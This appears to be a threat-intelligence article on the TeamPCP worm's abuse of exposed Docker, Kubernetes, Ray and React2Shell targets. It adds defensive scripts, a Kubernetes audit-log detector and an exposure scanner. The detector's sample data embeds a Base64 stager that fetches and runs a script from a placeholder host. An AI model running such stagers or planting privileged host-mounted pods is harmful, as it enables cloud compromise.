TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure

Cloud Cyberattack Campaign Abuses Exposed Docker APIs, Kubernetes Clusters and the React2Shell Vulnerability to Build Criminal Infrastructure at Scale

A large cloud-native cyberattack campaign has been uncovered, targeting exposed Docker Engine APIs, Kubernetes clusters, Ray dashboards, Redis servers, and unpatched React/Next.js applications to build a sprawling criminal infrastructure. The operation, which began around December 25, 2025, has been attributed to a threat actor known as TeamPCP (also operating under aliases including DeadCatx3, PCPcat, PersyPCP, and ShellForce).

According to cybersecurity researchers at Flare, this “worm-driven” campaign is one of the most comprehensive cloud exploitation operations documented to date. The attackers leveraged the critical React2Shell vulnerability (CVE-2025-55182, CVSS score: 10.0), an unauthenticated remote code execution flaw in React Server Components, alongside numerous other attack vectors, most of them exposed and unauthenticated services rather than software flaws, to systematically compromise cloud environments across North America, Europe, and the Middle East.

Operation Scale and Infrastructure

TeamPCP has established what researchers describe as a “self-propagating criminal ecosystem” that functions as a cloud-native cybercrime platform. The group runs a Telegram channel with more than 700 members, where stolen data from victims in Canada, Serbia, South Korea, the UAE, and the United States is publicly shared.

The campaign’s primary objectives include building distributed proxy and scanning infrastructure at scale, followed by server compromise for data exfiltration, ransomware deployment, extortion activities, and cryptocurrency mining operations. What makes this attack particularly concerning is its operational integration and industrial-scale automation rather than technical novelty.

Technical Exploitation Methodology

Rather than developing novel attack techniques, TeamPCP relies on proven methods including existing tools, known vulnerabilities, and widespread misconfigurations. The attack chain begins with automated scanning for exposed cloud services, followed by systematic exploitation using specialized payloads.

The core attack components include:

  • proxy.sh: The initial stager. It fingerprints the environment, detects whether it is running inside a Kubernetes cluster, and deploys cluster-specific secondary payloads. When Kubernetes is detected, the script branches into a separate execution path with distinct tooling for cloud-native targets.

  • scanner.py: Identifies misconfigured Docker APIs and Ray dashboards, pulling the CIDR ranges it scans from the GitHub account “DeadCatx3”; it also carries cryptocurrency-mining functionality through a companion “mine.sh” script.

  • kube.py: Kubernetes-specific tooling for harvesting cluster credentials, enumerating resources through the API server, and planting persistent backdoors by creating privileged pods on every node with the host filesystem mounted.

  • react.py: Engineered to exploit React2Shell (CVE-2025-55182) for remote command execution at scale.

  • pcpcat.py: Performs large-scale discovery of exposed Docker APIs and Ray dashboards across wide IP ranges and automatically launches malicious containers or Ray jobs that execute Base64-encoded payloads.
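The kube.py and pcpcat.py behaviour described above (privileged pods that mount the host root on every node, and stagers that decode a Base64 blob straight into a shell) leaves a distinctive signature in the Kubernetes audit log. The detector below is an added example written for this article, not tooling from Flare or from the campaign. The audit-log events it runs over are constructed here to show the pattern and follow the audit.k8s.io/v1 Event field layout; the stager command line is an assumed "echo blob | base64 -d | sh" shape built from a harmless placeholder URL.

```python
import base64
import json
import re
from typing import Any

# Assumed stager shape; the blob is built here from a placeholder URL,
# not taken from the campaign.
STAGER = "echo {} | base64 -d | sh".format(
    base64.b64encode(b"curl -s http://example.invalid/proxy.sh | sh").decode())

# Constructed audit-log lines (audit.k8s.io/v1 Event objects trimmed to the
# fields used below); illustrative records only.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {   # the kube.py pattern: privileged, host root mounted, stager command
        "verb": "create",
        "user": {"username": "system:serviceaccount:default:default"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "kube-proxy-x1"},
        "requestObject": {"spec": {
            "hostPID": True,
            "containers": [{"name": "p", "image": "alpine", "command": ["sh", "-c", STAGER],
                            "securityContext": {"privileged": True},
                            "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
            "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}},
    },
    {   # one-per-node variant delivered as a DaemonSet
        "verb": "create",
        "user": {"username": "system:serviceaccount:default:default"},
        "objectRef": {"resource": "daemonsets", "namespace": "kube-system", "name": "node-agent"},
        "requestObject": {"spec": {"template": {"spec": {
            "containers": [{"name": "a", "image": "alpine", "securityContext": {"privileged": True},
                            "volumeMounts": [{"name": "root", "mountPath": "/mnt"}]}],
            "volumes": [{"name": "root", "hostPath": {"path": "/"}}]}}}},
    },
    {   # ordinary application pod, no findings expected
        "verb": "create",
        "user": {"username": "ci-deployer"},
        "objectRef": {"resource": "pods", "namespace": "web", "name": "nginx-7d9f"},
        "requestObject": {"spec": {"containers": [{"name": "nginx", "image": "nginx:1.27"}]}},
    },
    {"verb": "list", "user": {"username": "system:serviceaccount:kube-system:metrics"},
     "objectRef": {"resource": "pods", "namespace": ""}},   # read-only, ignored
])

SHELLS = ("sh", "bash", "ash", "dash", "zsh")
TEMPLATED = {"daemonsets", "deployments", "jobs", "replicasets", "statefulsets"}


def decodes_into_shell(argv: list) -> bool:
    """True when a command line pipes the output of a base64 decode into a shell."""
    line = " ".join(argv)
    if "base64 -d" not in line and "base64 --decode" not in line:
        return False
    tail = line.split("base64", 1)[1]
    return any(re.search(rf"\|\s*{s}\b", tail) for s in SHELLS)


def pod_findings(spec: dict) -> list:
    """Return the host-escape and stager indicators present in one pod spec."""
    findings = []
    if spec.get("hostPID"):
        findings.append("hostPID")
    for vol in spec.get("volumes", []):
        path = vol.get("hostPath", {}).get("path")
        if path is not None and path.rstrip("/") == "":   # "/" or "//"
            findings.append(f"hostPath / mounted via volume {vol['name']}")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"privileged container {c['name']}")
        if decodes_into_shell(list(c.get("command", [])) + list(c.get("args", []))):
            findings.append(f"base64 stager in container {c['name']}")
    return findings


def scan_audit_log(text: str) -> list:
    """Scan JSON-lines audit events; report workload creations that carry findings."""
    hits = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        ref = ev.get("objectRef", {})
        resource = ref.get("resource")
        if ev.get("verb") != "create" or resource not in TEMPLATED | {"pods"}:
            continue
        spec = (ev.get("requestObject") or {}).get("spec") or {}
        if resource in TEMPLATED:            # controllers wrap a pod template
            spec = spec.get("template", {}).get("spec", {})
        findings = pod_findings(spec)
        if findings:
            hits.append({"user": ev["user"]["username"], "resource": resource,
                         "namespace": ref.get("namespace"), "name": ref.get("name"),
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_audit_log(SAMPLE_AUDIT_LOG):
        print(f"{hit['resource']}/{hit['namespace']}/{hit['name']} by {hit['user']}: "
              + "; ".join(hit["findings"]))
```

Feed it the API server's audit log (one JSON event per line) with a policy that records RequestResponse for pod and workload creations; privileged plus a hostPath of "/" from a default service account is the combination worth paging on, and the stager check catches the payload delivery even when the pod itself looks mundane.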

Command and Control Infrastructure

Researchers have identified a C2 server at 67.217.57[.]240 linked to Sliver, an open-source command-and-control framework increasingly abused by threat actors for post-exploitation activity. This infrastructure lets the attackers maintain persistent access and coordinate their operations across compromised environments.

Target Profile and Impact

Victim data shows that TeamPCP primarily hits Amazon Web Services (AWS) and Microsoft Azure environments, and that the attacks are opportunistic rather than aimed at specific industries: any organization running exposed cloud services becomes a “collateral victim” of the broader criminal operation.

The attack’s comprehensive nature allows TeamPCP to monetize both compute resources and stolen information simultaneously. Leaked CV databases, identity records, and corporate data are published through associated channels like ShellForce to fuel ransomware operations, fraud schemes, and cybercrime reputation building. This hybrid model provides multiple revenue streams and operational resilience against takedown attempts.

Industry Response and Mitigation

Security experts emphasize that the danger posed by TeamPCP stems not from technical innovation but from its ability to integrate many attack vectors into one cohesive, automated platform. Organizations are urged to audit their cloud environments immediately for exposed APIs, enforce authentication on every management interface, and apply patches for known vulnerabilities, including CVE-2025-55182 in React/Next.js. In practice that means never publishing the Docker Engine API on a TCP port without TLS client-certificate verification, binding Ray dashboards and Redis to private interfaces behind authentication, and enforcing Pod Security admission so that privileged pods with hostPath mounts cannot be created outside a small, audited set of namespaces.
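The audit recommended above can be scripted. The Python below is an added example for this article, not a tool from Flare or from the campaign: it probes a host for the two plaintext endpoints the scanners described on this page hunt for (the Docker Engine API on 2375 and the Ray dashboard on 8265) and checks a Docker daemon.json for a TCP listener configured without TLS client verification. The sample response bodies and the "ray_version" key in Ray's /api/version reply are assumptions made for illustration; run it only against hosts you own.

```python
import http.client
import json
import sys
from typing import Optional, Tuple

# 2375 is the plaintext Docker Engine API port (2376 is the TLS port); 8265 is
# the Ray dashboard, whose Jobs API on the same port runs arbitrary shell commands.
DOCKER_API_PORT = 2375
RAY_DASHBOARD_PORT = 8265


def classify_docker(status: int, body: str) -> Optional[str]:
    """GET /version on the Docker Engine API returns JSON carrying 'ApiVersion'.
    Getting it over plain TCP means the daemon answered with no client
    authentication at all: whoever reached the port can create containers."""
    if status != 200:
        return None
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    if isinstance(doc, dict) and "ApiVersion" in doc:
        return f"unauthenticated Docker Engine API (engine {doc.get('Version', '?')})"
    return None


def classify_ray(status: int, body: str) -> Optional[str]:
    """Ray's dashboard answers GET /api/version with JSON; the 'ray_version'
    key is assumed here. Reachability equals job submission on this port."""
    if status != 200:
        return None
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    if isinstance(doc, dict) and "ray_version" in doc:
        return f"unauthenticated Ray dashboard (ray {doc['ray_version']})"
    return None


def probe_http(host: str, port: int, path: str, timeout: float = 3.0) -> Optional[Tuple[int, str]]:
    """Plain HTTP GET; returns (status, body) or None if the port is unreachable.
    A TLS-only listener (Docker 2376) fails here, which is the desired outcome."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()


CHECKS = (
    (DOCKER_API_PORT, "/version", classify_docker),
    (RAY_DASHBOARD_PORT, "/api/version", classify_ray),
)


def audit_host(host: str) -> list:
    """Probe one host for both exposures and describe what was found."""
    findings = []
    for port, path, classify in CHECKS:
        reply = probe_http(host, port, path)
        verdict = classify(*reply) if reply else None
        if verdict:
            findings.append(f"{host}:{port} {verdict}")
    return findings


def daemon_json_findings(text: str) -> list:
    """Flag /etc/docker/daemon.json 'hosts' entries that listen on TCP while
    'tlsverify' is off, which is exactly the exposure the scanners look for."""
    cfg = json.loads(text)
    return [f"{h} listens without tlsverify" for h in cfg.get("hosts", [])
            if h.startswith("tcp://") and not cfg.get("tlsverify", False)]


if __name__ == "__main__":
    for target in sys.argv[1:]:
        print("\n".join(audit_host(target)) or f"{target}: nothing exposed")
```

Point it at your own public addresses from outside the VPC, and run daemon_json_findings over every host's daemon.json in configuration management; a "tcp://0.0.0.0:2375" entry without "tlsverify": true is a finding regardless of whether a firewall currently happens to block the port.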

The campaign demonstrates a complete lifecycle of cloud exploitation, from initial scanning through persistence establishment, data theft, and monetization. As cloud adoption continues to accelerate across industries, such comprehensive attack platforms represent an evolving threat landscape that demands enhanced security postures and continuous monitoring of cloud infrastructure.

tags: cloud security, cyberattack, Docker vulnerability, Kubernetes exploitation, React2Shell, TeamPCP, DeadCatx3, cloud-native threats, ransomware, cryptocurrency mining, data breach, AWS security, Azure security, Sliver C2, cloud infrastructure, cybersecurity incident, cloud exploitation, proxy infrastructure, worm-driven attack, cloud cybercrime
